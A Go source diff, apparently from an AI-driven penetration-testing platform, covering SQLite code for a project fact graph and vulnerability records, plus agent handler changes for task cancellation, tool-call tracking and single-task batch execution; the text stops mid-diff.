SourceConversationID string `json:"source_conversation_id,omitempty"`
CreatedAt time.Time `json:"created_at"`
UpdatedAt time.Time `json:"updated_at"`
}
// ProjectFactEdgeInput 写入边时的输入(出边:source → To)。
type ProjectFactEdgeInput struct {
To string `json:"to"`
Type string `json:"type"`
Confidence string `json:"confidence,omitempty"`
}
// ProjectFactEdgeFromInput 写入入边时的输入(From → 当前事实)。
type ProjectFactEdgeFromInput struct {
From string `json:"from"`
Type string `json:"type"`
Confidence string `json:"confidence,omitempty"`
}
// ProjectFactGraphNode 图 API 节点。
type ProjectFactGraphNode struct {
ID string `json:"id"`
FactKey string `json:"fact_key"`
Category string `json:"category"`
Label string `json:"label"` // 图节点短标签(截断)
Summary string `json:"summary"` // 完整摘要(侧栏等详情用)
Confidence string `json:"confidence"`
Type string `json:"type"`
Pinned bool `json:"pinned"`
}
// ProjectFactGraphEdge 图 API 边。
type ProjectFactGraphEdge struct {
ID string `json:"id"`
Source string `json:"source"`
Target string `json:"target"`
Type string `json:"type"`
Confidence string `json:"confidence"`
}
// ProjectFactGraph 项目事实图。
type ProjectFactGraph struct {
Nodes []ProjectFactGraphNode `json:"nodes"`
Edges []ProjectFactGraphEdge `json:"edges"`
}
// ValidateProjectFactEdgeType 校验边类型。
func ValidateProjectFactEdgeType(edgeType string) error {
edgeType = strings.TrimSpace(strings.ToLower(edgeType))
if edgeType == "" {
return fmt.Errorf("edge type 不能为空")
}
if _, ok := ValidProjectFactEdgeTypes[edgeType]; !ok {
return fmt.Errorf("无效的 edge type: %s", edgeType)
}
return nil
}
func normalizeEdgeConfidence(confidence string) string {
confidence = strings.TrimSpace(strings.ToLower(confidence))
switch confidence {
case "confirmed", "deprecated":
return confidence
default:
return "tentative"
}
}
// ListProjectFactEdgesByProject 列出项目全部边。
func (db *DB) ListProjectFactEdgesByProject(projectID string) ([]*ProjectFactEdge, error) {
rows, err := db.Query(
`SELECT id, project_id, source_fact_key, target_fact_key, edge_type, confidence,
COALESCE(source_conversation_id,''), created_at, updated_at
FROM project_fact_edges
WHERE project_id = ?
ORDER BY created_at ASC, rowid ASC`,
projectID,
)
if err != nil {
return nil, err
}
defer rows.Close()
return scanProjectFactEdges(rows)
}
// ListOutgoingProjectFactEdges 列出某事实的全部出边。
func (db *DB) ListOutgoingProjectFactEdges(projectID, sourceFactKey string) ([]*ProjectFactEdge, error) {
rows, err := db.Query(
`SELECT id, project_id, source_fact_key, target_fact_key, edge_type, confidence,
COALESCE(source_conversation_id,''), created_at, updated_at
FROM project_fact_edges
WHERE project_id = ? AND source_fact_key = ?
ORDER BY created_at ASC, rowid ASC`,
projectID, sourceFactKey,
)
if err != nil {
return nil, err
}
defer rows.Close()
return scanProjectFactEdges(rows)
}
// ListIncomingProjectFactEdges 列出某事实的全部入边。
func (db *DB) ListIncomingProjectFactEdges(projectID, targetFactKey string) ([]*ProjectFactEdge, error) {
rows, err := db.Query(
`SELECT id, project_id, source_fact_key, target_fact_key, edge_type, confidence,
COALESCE(source_conversation_id,''), created_at, updated_at
FROM project_fact_edges
WHERE project_id = ? AND target_fact_key = ?
ORDER BY created_at ASC, rowid ASC`,
projectID, targetFactKey,
)
if err != nil {
return nil, err
}
defer rows.Close()
return scanProjectFactEdges(rows)
}
// ReplaceOutgoingProjectFactEdges 替换某事实的全部出边(links 省略时不调用)。
func (db *DB) ReplaceOutgoingProjectFactEdges(projectID, sourceFactKey, sourceConversationID string, inputs []ProjectFactEdgeInput) error {
sourceFactKey = strings.TrimSpace(sourceFactKey)
if sourceFactKey == "" {
return fmt.Errorf("source_fact_key 不能为空")
}
if _, err := db.Exec(
`DELETE FROM project_fact_edges WHERE project_id = ? AND source_fact_key = ?`,
projectID, sourceFactKey,
); err != nil {
return fmt.Errorf("清除旧边失败: %w", err)
}
for _, in := range inputs {
target := strings.TrimSpace(in.To)
if target == "" {
continue
}
if err := ValidateFactKey(target); err != nil {
return fmt.Errorf("target fact_key 无效 (%s): %w", target, err)
}
if target == sourceFactKey {
return fmt.Errorf("边不能指向自身: %s", sourceFactKey)
}
if err := ValidateProjectFactEdgeType(in.Type); err != nil {
return err
}
edge := &ProjectFactEdge{
ID: uuid.New().String(),
ProjectID: projectID,
SourceFactKey: sourceFactKey,
TargetFactKey: target,
EdgeType: strings.ToLower(strings.TrimSpace(in.Type)),
Confidence: normalizeEdgeConfidence(in.Confidence),
SourceConversationID: sourceConversationID,
CreatedAt: time.Now(),
UpdatedAt: time.Now(),
}
if err := db.insertProjectFactEdge(edge); err != nil {
return err
}
}
return nil
}
// ReplaceIncomingProjectFactEdges 替换某事实的全部入边(From 为来源 fact_key)。
func (db *DB) ReplaceIncomingProjectFactEdges(projectID, targetFactKey string, inputs []ProjectFactEdgeFromInput) error {
targetFactKey = strings.TrimSpace(targetFactKey)
if targetFactKey == "" {
return fmt.Errorf("target_fact_key 不能为空")
}
if _, err := db.Exec(
`DELETE FROM project_fact_edges WHERE project_id = ? AND target_fact_key = ?`,
projectID, targetFactKey,
); err != nil {
return fmt.Errorf("清除旧入边失败: %w", err)
}
for _, in := range inputs {
source := strings.TrimSpace(in.From)
if source == "" {
continue
}
if err := ValidateFactKey(source); err != nil {
return fmt.Errorf("source fact_key 无效 (%s): %w", source, err)
}
if source == targetFactKey {
return fmt.Errorf("边不能指向自身: %s", targetFactKey)
}
if err := ValidateProjectFactEdgeType(in.Type); err != nil {
return err
}
sourceConversationID := ""
if srcFact, err := db.GetProjectFactByKey(projectID, source); err == nil && srcFact != nil {
sourceConversationID = srcFact.SourceConversationID
}
edge := &ProjectFactEdge{
ID: uuid.New().String(),
ProjectID: projectID,
SourceFactKey: source,
TargetFactKey: targetFactKey,
EdgeType: strings.ToLower(strings.TrimSpace(in.Type)),
Confidence: normalizeEdgeConfidence(in.Confidence),
SourceConversationID: sourceConversationID,
CreatedAt: time.Now(),
UpdatedAt: time.Now(),
}
if err := db.insertProjectFactEdge(edge); err != nil {
return err
}
}
return nil
}
// GetProjectFactEdge 按 ID 获取边。
func (db *DB) GetProjectFactEdge(edgeID string) (*ProjectFactEdge, error) {
var e ProjectFactEdge
var createdAt, updatedAt string
err := db.QueryRow(
`SELECT id, project_id, source_fact_key, target_fact_key, edge_type, confidence,
COALESCE(source_conversation_id,''), created_at, updated_at
FROM project_fact_edges WHERE id = ?`, edgeID,
).Scan(&e.ID, &e.ProjectID, &e.SourceFactKey, &e.TargetFactKey, &e.EdgeType, &e.Confidence,
&e.SourceConversationID, &createdAt, &updatedAt)
if err != nil {
return nil, fmt.Errorf("边不存在")
}
e.CreatedAt = parseDBTime(createdAt)
e.UpdatedAt = parseDBTime(updatedAt)
return &e, nil
}
// AddProjectFactEdge 新增单条边(已存在则更新 confidence)。
func (db *DB) AddProjectFactEdge(projectID string, in ProjectFactEdgeInput, sourceFactKey, sourceConversationID string) (*ProjectFactEdge, error) {
sourceFactKey = strings.TrimSpace(sourceFactKey)
target := strings.TrimSpace(in.To)
if sourceFactKey == "" || target == "" {
return nil, fmt.Errorf("source 与 target 必填")
}
if sourceFactKey == target {
return nil, fmt.Errorf("边不能指向自身")
}
if err := ValidateProjectFactEdgeType(in.Type); err != nil {
return nil, err
}
if err := ValidateFactKey(target); err != nil {
return nil, err
}
now := time.Now()
e := &ProjectFactEdge{
ID: uuid.New().String(),
ProjectID: projectID,
SourceFactKey: sourceFactKey,
TargetFactKey: target,
EdgeType: strings.ToLower(strings.TrimSpace(in.Type)),
Confidence: normalizeEdgeConfidence(in.Confidence),
SourceConversationID: sourceConversationID,
CreatedAt: now,
UpdatedAt: now,
}
_, err := db.Exec(
`INSERT INTO project_fact_edges (
id, project_id, source_fact_key, target_fact_key, edge_type, confidence,
source_conversation_id, created_at, updated_at
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)
ON CONFLICT(project_id, source_fact_key, target_fact_key, edge_type)
DO UPDATE SET confidence = excluded.confidence, updated_at = excluded.updated_at`,
e.ID, e.ProjectID, e.SourceFactKey, e.TargetFactKey, e.EdgeType, e.Confidence,
nullIfEmpty(e.SourceConversationID), e.CreatedAt, e.UpdatedAt,
)
if err != nil {
return nil, fmt.Errorf("添加边失败: %w", err)
}
// 返回最新
rows, err := db.Query(
`SELECT id, project_id, source_fact_key, target_fact_key, edge_type, confidence,
COALESCE(source_conversation_id,''), created_at, updated_at
FROM project_fact_edges
WHERE project_id = ? AND source_fact_key = ? AND target_fact_key = ? AND edge_type = ?`,
projectID, sourceFactKey, target, e.EdgeType,
)
if err != nil {
return e, nil
}
defer rows.Close()
list, err := scanProjectFactEdges(rows)
if err != nil || len(list) == 0 {
return e, nil
}
return list[0], nil
}
// DeleteProjectFactEdge 删除单条边。
func (db *DB) DeleteProjectFactEdge(edgeID string) error {
res, err := db.Exec(`DELETE FROM project_fact_edges WHERE id = ?`, edgeID)
if err != nil {
return err
}
n, _ := res.RowsAffected()
if n == 0 {
return fmt.Errorf("边不存在")
}
return nil
}
func (db *DB) insertProjectFactEdge(e *ProjectFactEdge) error {
_, err := db.Exec(
`INSERT INTO project_fact_edges (
id, project_id, source_fact_key, target_fact_key, edge_type, confidence,
source_conversation_id, created_at, updated_at
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)`,
e.ID, e.ProjectID, e.SourceFactKey, e.TargetFactKey, e.EdgeType, e.Confidence,
nullIfEmpty(e.SourceConversationID), e.CreatedAt, e.UpdatedAt,
)
if err != nil {
return fmt.Errorf("写入边失败: %w", err)
}
return nil
}
// RenameProjectFactKeyEdges 事实 key 变更时同步边上的引用。
func (db *DB) RenameProjectFactKeyEdges(projectID, oldKey, newKey string) error {
oldKey = strings.TrimSpace(oldKey)
newKey = strings.TrimSpace(newKey)
if oldKey == "" || newKey == "" || oldKey == newKey {
return nil
}
now := time.Now()
if _, err := db.Exec(
`UPDATE project_fact_edges SET source_fact_key = ?, updated_at = ?
WHERE project_id = ? AND source_fact_key = ?`,
newKey, now, projectID, oldKey,
); err != nil {
return err
}
_, err := db.Exec(
`UPDATE project_fact_edges SET target_fact_key = ?, updated_at = ?
WHERE project_id = ? AND target_fact_key = ?`,
newKey, now, projectID, oldKey,
)
return err
}
// DeleteProjectFactEdgesForKey 删除与某 fact_key 相关的全部边。
func (db *DB) DeleteProjectFactEdgesForKey(projectID, factKey string) error {
_, err := db.Exec(
`DELETE FROM project_fact_edges
WHERE project_id = ? AND (source_fact_key = ? OR target_fact_key = ?)`,
projectID, factKey, factKey,
)
return err
}
// DeprecateProjectFactEdgesForKey 将关联边标记为 deprecated。
func (db *DB) DeprecateProjectFactEdgesForKey(projectID, factKey string) error {
now := time.Now()
_, err := db.Exec(
`UPDATE project_fact_edges SET confidence = 'deprecated', updated_at = ?
WHERE project_id = ? AND (source_fact_key = ? OR target_fact_key = ?)
AND confidence != 'deprecated'`,
now, projectID, factKey, factKey,
)
return err
}
func scanProjectFactEdges(rows *sql.Rows) ([]*ProjectFactEdge, error) {
var out []*ProjectFactEdge
for rows.Next() {
var e ProjectFactEdge
var createdAt, updatedAt string
if err := rows.Scan(
&e.ID, &e.ProjectID, &e.SourceFactKey, &e.TargetFactKey, &e.EdgeType, &e.Confidence,
&e.SourceConversationID, &createdAt, &updatedAt,
); err != nil {
return nil, err
}
e.CreatedAt = parseDBTime(createdAt)
e.UpdatedAt = parseDBTime(updatedAt)
out = append(out, &e)
}
return out, rows.Err()
}
+33
View File
@@ -0,0 +1,33 @@
package database
import (
"errors"
"strings"
"time"
)
// formatSQLiteUTC stores instants as UTC RFC3339 for consistent SQLite reads/writes.
func formatSQLiteUTC(t time.Time) string {
return t.UTC().Format(time.RFC3339Nano)
}
// sqliteEpochGE returns SQL comparing column to param as Unix seconds (timezone-safe).
func sqliteEpochGE(column, op string) string {
return "strftime('%s', " + column + ") " + op + " strftime('%s', ?)"
}
// ParseRFC3339Time parses API/query timestamps (RFC3339 or RFC3339Nano).
func ParseRFC3339Time(value string) (time.Time, error) {
value = strings.TrimSpace(value)
if value == "" {
return time.Time{}, errors.New("empty time value")
}
if t, err := time.Parse(time.RFC3339Nano, value); err == nil {
return t.UTC(), nil
}
t, err := time.Parse(time.RFC3339, value)
if err != nil {
return time.Time{}, err
}
return t.UTC(), nil
}
+5 -5
View File
@@ -98,7 +98,7 @@ type Vulnerability struct {
Title string `json:"title"` Title string `json:"title"`
Description string `json:"description"` Description string `json:"description"`
Severity string `json:"severity"` // critical, high, medium, low, info Severity string `json:"severity"` // critical, high, medium, low, info
Status string `json:"status"` // open, confirmed, fixed, false_positive Status string `json:"status"` // open, confirmed, fixed, false_positive, ignored
Type string `json:"type"` Type string `json:"type"`
Target string `json:"target"` Target string `json:"target"`
Proof string `json:"proof"` Proof string `json:"proof"`
@@ -138,7 +138,7 @@ func (db *DB) CreateVulnerability(vuln *Vulnerability) (*Vulnerability, error) {
_, err := db.Exec( _, err := db.Exec(
query, query,
vuln.ID, vuln.ConversationID, nullIfEmpty(vuln.ProjectID), vuln.ConversationTag, vuln.TaskTag, vuln.Title, vuln.Description, vuln.ID, nullIfEmpty(vuln.ConversationID), nullIfEmpty(vuln.ProjectID), vuln.ConversationTag, vuln.TaskTag, vuln.Title, vuln.Description,
vuln.Severity, vuln.Status, vuln.Type, vuln.Target, vuln.Severity, vuln.Status, vuln.Type, vuln.Target,
vuln.Proof, vuln.Impact, vuln.Recommendation, vuln.Proof, vuln.Impact, vuln.Recommendation,
vuln.CreatedAt, vuln.UpdatedAt, vuln.CreatedAt, vuln.UpdatedAt,
@@ -154,7 +154,7 @@ func (db *DB) CreateVulnerability(vuln *Vulnerability) (*Vulnerability, error) {
func (db *DB) GetVulnerability(id string) (*Vulnerability, error) { func (db *DB) GetVulnerability(id string) (*Vulnerability, error) {
var vuln Vulnerability var vuln Vulnerability
query := ` query := `
SELECT id, conversation_id, COALESCE(project_id,''), title, description, severity, status, SELECT id, COALESCE(conversation_id,''), COALESCE(project_id,''), title, description, severity, status,
conversation_tag, task_tag, vulnerability_type, target, proof, impact, recommendation, conversation_tag, task_tag, vulnerability_type, target, proof, impact, recommendation,
COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id, COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id,
COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id, COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id,
@@ -183,7 +183,7 @@ func (db *DB) GetVulnerability(id string) (*Vulnerability, error) {
// ListVulnerabilities 列出漏洞 // ListVulnerabilities 列出漏洞
func (db *DB) ListVulnerabilities(limit, offset int, filter VulnerabilityListFilter) ([]*Vulnerability, error) { func (db *DB) ListVulnerabilities(limit, offset int, filter VulnerabilityListFilter) ([]*Vulnerability, error) {
query := ` query := `
SELECT id, conversation_id, COALESCE(project_id,''), title, description, severity, status, conversation_tag, task_tag, SELECT id, COALESCE(conversation_id,''), COALESCE(project_id,''), title, description, severity, status, conversation_tag, task_tag,
vulnerability_type, target, proof, impact, recommendation, vulnerability_type, target, proof, impact, recommendation,
COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id, COALESCE((SELECT bt.id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_id,
COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id, COALESCE((SELECT bt.queue_id FROM batch_tasks bt WHERE bt.conversation_id = vulnerabilities.conversation_id LIMIT 1), '') AS task_queue_id,
@@ -403,7 +403,7 @@ func (db *DB) GetVulnerabilityFilterOptions() (map[string][]string, error) {
if err != nil { if err != nil {
return nil, fmt.Errorf("查询漏洞ID建议失败: %w", err) return nil, fmt.Errorf("查询漏洞ID建议失败: %w", err)
} }
conversationIDs, err := collect(`SELECT DISTINCT conversation_id FROM vulnerabilities WHERE conversation_id <> '' ORDER BY created_at DESC LIMIT 500`) conversationIDs, err := collect(`SELECT DISTINCT conversation_id FROM vulnerabilities WHERE conversation_id IS NOT NULL AND conversation_id <> '' ORDER BY created_at DESC LIMIT 500`)
if err != nil { if err != nil {
return nil, fmt.Errorf("查询会话ID建议失败: %w", err) return nil, fmt.Errorf("查询会话ID建议失败: %w", err)
} }
+3 -2
View File
@@ -16,7 +16,8 @@ import (
) )
// ExecutionRecorder 可选,在 MCP 工具成功返回且带有 execution id 时回调(用于汇总 mcpExecutionIds)。 // ExecutionRecorder 可选,在 MCP 工具成功返回且带有 execution id 时回调(用于汇总 mcpExecutionIds)。
type ExecutionRecorder func(executionID string) // toolCallID 来自 Eino compose.GetToolCallID,用于与 reduction 后的展示结果关联。
type ExecutionRecorder func(executionID, toolCallID string)
// ToolErrorPrefix 用于把内部 MCP 执行结果中的 IsError 标记传递到多代理上层。 // ToolErrorPrefix 用于把内部 MCP 执行结果中的 IsError 标记传递到多代理上层。
// Eino 工具通道目前只支持返回字符串,因此通过前缀标识,随后在多代理 runner 中解析为 success/isError。 // Eino 工具通道目前只支持返回字符串,因此通过前缀标识,随后在多代理 runner 中解析为 success/isError。
@@ -178,7 +179,7 @@ func runMCPToolInvocation(
return "", nil return "", nil
} }
if res.ExecutionID != "" && record != nil { if res.ExecutionID != "" && record != nil {
record(res.ExecutionID) record(res.ExecutionID, compose.GetToolCallID(ctx))
} }
if res.IsError { if res.IsError {
return ToolErrorPrefix + res.Result, nil return ToolErrorPrefix + res.Result, nil
+2 -2
View File
@@ -2,8 +2,8 @@ package einomcp
import "sync" import "sync"
// ToolInvokeNotifyHolder 由 Eino run loop 在迭代开始前 Set 回调;MCP 桥在每次 InvokableRun 结束时 Fire // ToolInvokeNotifyHolder 由 Eino run loop 在迭代开始前 Set 回调;MCP/execute 桥在工具调用结束时 Fire
// 用于 ADK 未透出 schema.Tool 事件时仍推送 tool_result、清 pending,避免 UI 卡在「执行中」或迭代末 force-close // 用于清除 pending tool_calltool_result 由 ADK schema.Tool 事件推送,含流式工具与 reduction 后正文)
type ToolInvokeNotifyHolder struct { type ToolInvokeNotifyHolder struct {
mu sync.RWMutex mu sync.RWMutex
fn func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error) fn func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error)
+125 -45
View File
@@ -190,6 +190,21 @@ func (h *AgentHandler) SetAudit(s *audit.Service) {
h.audit = s h.audit = s
} }
// CancelRunningTaskForConversation stops any in-flight agent work for the conversation (idempotent).
func (h *AgentHandler) CancelRunningTaskForConversation(conversationID string) {
if h == nil || conversationID == "" || h.tasks == nil {
return
}
if execID := h.tasks.ActiveMCPExecutionID(conversationID); execID != "" {
h.agent.CancelMCPToolExecutionWithNote(execID, "")
}
if ok, err := h.tasks.CancelTask(conversationID, ErrTaskCancelled); ok {
h.logger.Info("已取消会话运行中任务", zap.String("conversationId", conversationID))
} else if err != nil {
h.logger.Warn("取消会话运行中任务失败", zap.String("conversationId", conversationID), zap.Error(err))
}
}
// HitlToolWhitelistSaver 合并 HITL 免审批工具到全局配置并落盘 // HitlToolWhitelistSaver 合并 HITL 免审批工具到全局配置并落盘
type HitlToolWhitelistSaver interface { type HitlToolWhitelistSaver interface {
MergeHitlToolWhitelistIntoConfig(add []string) error MergeHitlToolWhitelistIntoConfig(add []string) error
@@ -631,27 +646,11 @@ func (h *AgentHandler) runRobotEinoSingleWithRetry(
assistantMessageID string, assistantMessageID string,
taskStatus *string, taskStatus *string,
) (string, string, error) { ) (string, string, error) {
curHist := history resultMA, errMA := multiagent.RunEinoSingleChatModelAgent(
curMsg := finalMessage taskCtx, h.config, &h.config.MultiAgent, h.agent, h.db, h.logger,
segmentUserMessage := finalMessage conversationID, h.conversationProjectID(conversationID), finalMessage, history, roleTools, progressCallback, nil, h.projectBlackboardBlock(conversationID),
var resultMA *multiagent.RunResult )
var errMA error if errMA != nil {
var transientRunAttempts int
for {
resultMA, errMA = multiagent.RunEinoSingleChatModelAgent(
taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger,
conversationID, curMsg, curHist, roleTools, progressCallback, nil, h.projectBlackboardBlock(conversationID),
)
if errMA == nil {
transientRunAttempts = 0
break
}
if handled, _ := h.handleEinoTransientRetryContinue(
taskCtx, conversationID, resultMA, errMA, &transientRunAttempts,
&curHist, &curMsg, segmentUserMessage, progressCallback, nil,
); handled {
continue
}
*taskStatus = "failed" *taskStatus = "failed"
return h.finalizeRobotAgentError(taskCtx, assistantMessageID, conversationID, resultMA, errMA) return h.finalizeRobotAgentError(taskCtx, assistantMessageID, conversationID, resultMA, errMA)
} }
@@ -667,28 +666,12 @@ func (h *AgentHandler) runRobotMultiAgentWithRetry(
assistantMessageID string, assistantMessageID string,
taskStatus *string, taskStatus *string,
) (string, string, error) { ) (string, string, error) {
curHist := history resultMA, errMA := multiagent.RunDeepAgent(
curMsg := finalMessage taskCtx, h.config, &h.config.MultiAgent, h.agent, h.db, h.logger,
segmentUserMessage := finalMessage conversationID, h.conversationProjectID(conversationID), finalMessage, history, roleTools, progressCallback,
var resultMA *multiagent.RunResult h.agentsMarkdownDir, orchestration, nil, h.projectBlackboardBlock(conversationID),
var errMA error )
var transientRunAttempts int if errMA != nil {
for {
resultMA, errMA = multiagent.RunDeepAgent(
taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger,
conversationID, curMsg, curHist, roleTools, progressCallback,
h.agentsMarkdownDir, orchestration, nil, h.projectBlackboardBlock(conversationID),
)
if errMA == nil {
transientRunAttempts = 0
break
}
if handled, _ := h.handleEinoTransientRetryContinue(
taskCtx, conversationID, resultMA, errMA, &transientRunAttempts,
&curHist, &curMsg, segmentUserMessage, progressCallback, nil,
); handled {
continue
}
*taskStatus = "failed" *taskStatus = "failed"
return h.finalizeRobotAgentError(taskCtx, assistantMessageID, conversationID, resultMA, errMA) return h.finalizeRobotAgentError(taskCtx, assistantMessageID, conversationID, resultMA, errMA)
} }
@@ -1159,6 +1142,8 @@ func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun
} }
} }
flushResponsePlan() flushResponsePlan()
// 助手正文开始前,推理流通常已结束;落库以便刷新后「渗透测试详情」可回放
flushThinkingStreams()
respPlan.meta = nil respPlan.meta = nil
if dataMap, ok := data.(map[string]interface{}); ok { if dataMap, ok := data.(map[string]interface{}); ok {
respPlan.meta = make(map[string]interface{}, len(dataMap)) respPlan.meta = make(map[string]interface{}, len(dataMap))
@@ -1194,6 +1179,19 @@ func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun
} }
if eventType == "response" { if eventType == "response" {
flushResponsePlan() flushResponsePlan()
flushThinkingStreams()
return
}
if eventType == "done" {
flushResponsePlan()
flushThinkingStreams()
return
}
// 流式思考/推理结束:聚合落库(与 eino_agent_reply_stream_end 同理)
if eventType == "thinking_stream_end" || eventType == "reasoning_chain_stream_end" {
flushResponsePlan()
flushThinkingStreams()
return return
} }
@@ -1268,7 +1266,10 @@ func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun
// 保存过程详情到数据库(排除 response/doneresponse 正文已在 messages 表) // 保存过程详情到数据库(排除 response/doneresponse 正文已在 messages 表)
// response_start/response_delta 已聚合为 planning,不落逐条。 // response_start/response_delta 已聚合为 planning,不落逐条。
// [Eino] agent 心跳 progress 仅用于实时进度标题,不落库以免时间线刷屏。
skipEinoAgentHeartbeat := eventType == "progress" && strings.HasPrefix(strings.TrimSpace(message), "[Eino] ")
if assistantMessageID != "" && if assistantMessageID != "" &&
!skipEinoAgentHeartbeat &&
eventType != "response" && eventType != "response" &&
eventType != "done" && eventType != "done" &&
eventType != "response_start" && eventType != "response_start" &&
@@ -1335,6 +1336,21 @@ func (h *AgentHandler) CancelAgentLoop(c *gin.Context) {
}) })
return return
} }
if h.tasks.AbortActiveEinoExecute(req.ConversationID, note) {
h.logger.Info("对话页仅终止当前 Eino execute",
zap.String("conversationId", req.ConversationID),
zap.Bool("hasNote", note != ""),
)
c.JSON(http.StatusOK, gin.H{
"status": "tool_abort_requested",
"conversationId": req.ConversationID,
"message": "已请求终止当前 execute 命令;命令返回后本轮推理将继续。",
"continueAfter": true,
"interruptWithNote": note != "",
"continueWithoutTool": false,
})
return
}
// 无进行中的 MCP 工具(模型纯推理/流式输出阶段):取消当前上下文并由 Eino 流式处理器合并用户补充后自动续跑。 // 无进行中的 MCP 工具(模型纯推理/流式输出阶段):取消当前上下文并由 Eino 流式处理器合并用户补充后自动续跑。
h.tasks.SetInterruptContinueNote(req.ConversationID, note) h.tasks.SetInterruptContinueNote(req.ConversationID, note)
ok, err := h.tasks.CancelTask(req.ConversationID, multiagent.ErrInterruptContinue) ok, err := h.tasks.CancelTask(req.ConversationID, multiagent.ErrInterruptContinue)
@@ -1637,6 +1653,7 @@ func (h *AgentHandler) ListBatchQueues(c *gin.Context) {
// StartBatchQueue 开始执行批量任务队列 // StartBatchQueue 开始执行批量任务队列
func (h *AgentHandler) StartBatchQueue(c *gin.Context) { func (h *AgentHandler) StartBatchQueue(c *gin.Context) {
queueID := c.Param("queueId") queueID := c.Param("queueId")
h.batchTaskManager.ClearSingleRunTask(queueID)
ok, err := h.startBatchQueueExecution(queueID, false) ok, err := h.startBatchQueueExecution(queueID, false)
if err != nil { if err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
@@ -1668,6 +1685,7 @@ func (h *AgentHandler) RerunBatchQueue(c *gin.Context) {
c.JSON(http.StatusInternalServerError, gin.H{"error": "重置队列失败"}) c.JSON(http.StatusInternalServerError, gin.H{"error": "重置队列失败"})
return return
} }
h.batchTaskManager.ClearSingleRunTask(queueID)
ok, err := h.startBatchQueueExecution(queueID, false) ok, err := h.startBatchQueueExecution(queueID, false)
if err != nil { if err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
@@ -1867,6 +1885,53 @@ func (h *AgentHandler) AddBatchTask(c *gin.Context) {
c.JSON(http.StatusOK, gin.H{"message": "任务已添加", "task": task, "queue": queue}) c.JSON(http.StatusOK, gin.H{"message": "任务已添加", "task": task, "queue": queue})
} }
// RunSingleBatchTask 单条执行指定子任务(可覆盖已成功项),完成后暂停队列
func (h *AgentHandler) RunSingleBatchTask(c *gin.Context) {
queueID := c.Param("queueId")
taskID := c.Param("taskId")
if err := h.batchTaskManager.PrepareSingleTaskRun(queueID, taskID); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
return
}
h.batchTaskManager.SetSingleRunTask(queueID, taskID)
// 暂停态单条执行:旧批量协程可能仍占用执行槽,先回收以便重新启动
if queue, ok := h.batchTaskManager.GetBatchQueue(queueID); ok && queue.Status == BatchQueueStatusPaused {
h.forceUnmarkBatchQueueRunning(queueID)
}
autoStarted := true
autoStartMsg := "已开始单条执行"
ok, startErr := h.startBatchQueueExecution(queueID, false)
if startErr != nil {
h.batchTaskManager.ClearSingleRunTask(queueID)
autoStarted = false
autoStartMsg = "任务已准备就绪,但自动启动失败: " + startErr.Error()
} else if !ok {
h.batchTaskManager.ClearSingleRunTask(queueID)
autoStarted = false
autoStartMsg = "任务已准备就绪,但队列不存在"
}
queue, exists := h.batchTaskManager.GetBatchQueue(queueID)
if !exists {
c.JSON(http.StatusNotFound, gin.H{"error": "队列不存在"})
return
}
if h.audit != nil {
h.audit.RecordOK(c, "task", "run_single_batch_task", "单条执行批量子任务", "batch_task", taskID, map[string]interface{}{
"batch_queue_id": queueID,
"auto_started": autoStarted,
})
}
c.JSON(http.StatusOK, gin.H{
"message": autoStartMsg,
"queue": queue,
"autoStarted": autoStarted,
})
}
// DeleteBatchTask 删除批量任务 // DeleteBatchTask 删除批量任务
func (h *AgentHandler) DeleteBatchTask(c *gin.Context) { func (h *AgentHandler) DeleteBatchTask(c *gin.Context) {
queueID := c.Param("queueId") queueID := c.Param("queueId")
@@ -1908,6 +1973,10 @@ func (h *AgentHandler) unmarkBatchQueueRunning(queueID string) {
delete(h.batchRunning, queueID) delete(h.batchRunning, queueID)
} }
func (h *AgentHandler) forceUnmarkBatchQueueRunning(queueID string) {
h.unmarkBatchQueueRunning(queueID)
}
func (h *AgentHandler) nextBatchQueueRunAt(cronExpr string, from time.Time) (*time.Time, error) { func (h *AgentHandler) nextBatchQueueRunAt(cronExpr string, from time.Time) (*time.Time, error) {
expr := strings.TrimSpace(cronExpr) expr := strings.TrimSpace(cronExpr)
if expr == "" { if expr == "" {
@@ -2055,6 +2124,10 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
h.logger.Error("创建对话失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(err)) h.logger.Error("创建对话失败", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.Error(err))
h.batchTaskManager.UpdateTaskStatus(queueID, task.ID, "failed", "", "创建对话失败: "+err.Error()) h.batchTaskManager.UpdateTaskStatus(queueID, task.ID, "failed", "", "创建对话失败: "+err.Error())
h.batchTaskManager.MoveToNextTask(queueID) h.batchTaskManager.MoveToNextTask(queueID)
if h.batchTaskManager.TakeSingleRunTaskIfMatch(queueID, task.ID) {
h.batchTaskManager.UpdateQueueStatus(queueID, "paused")
break
}
continue continue
} }
conversationID = conv.ID conversationID = conv.ID
@@ -2172,6 +2245,7 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
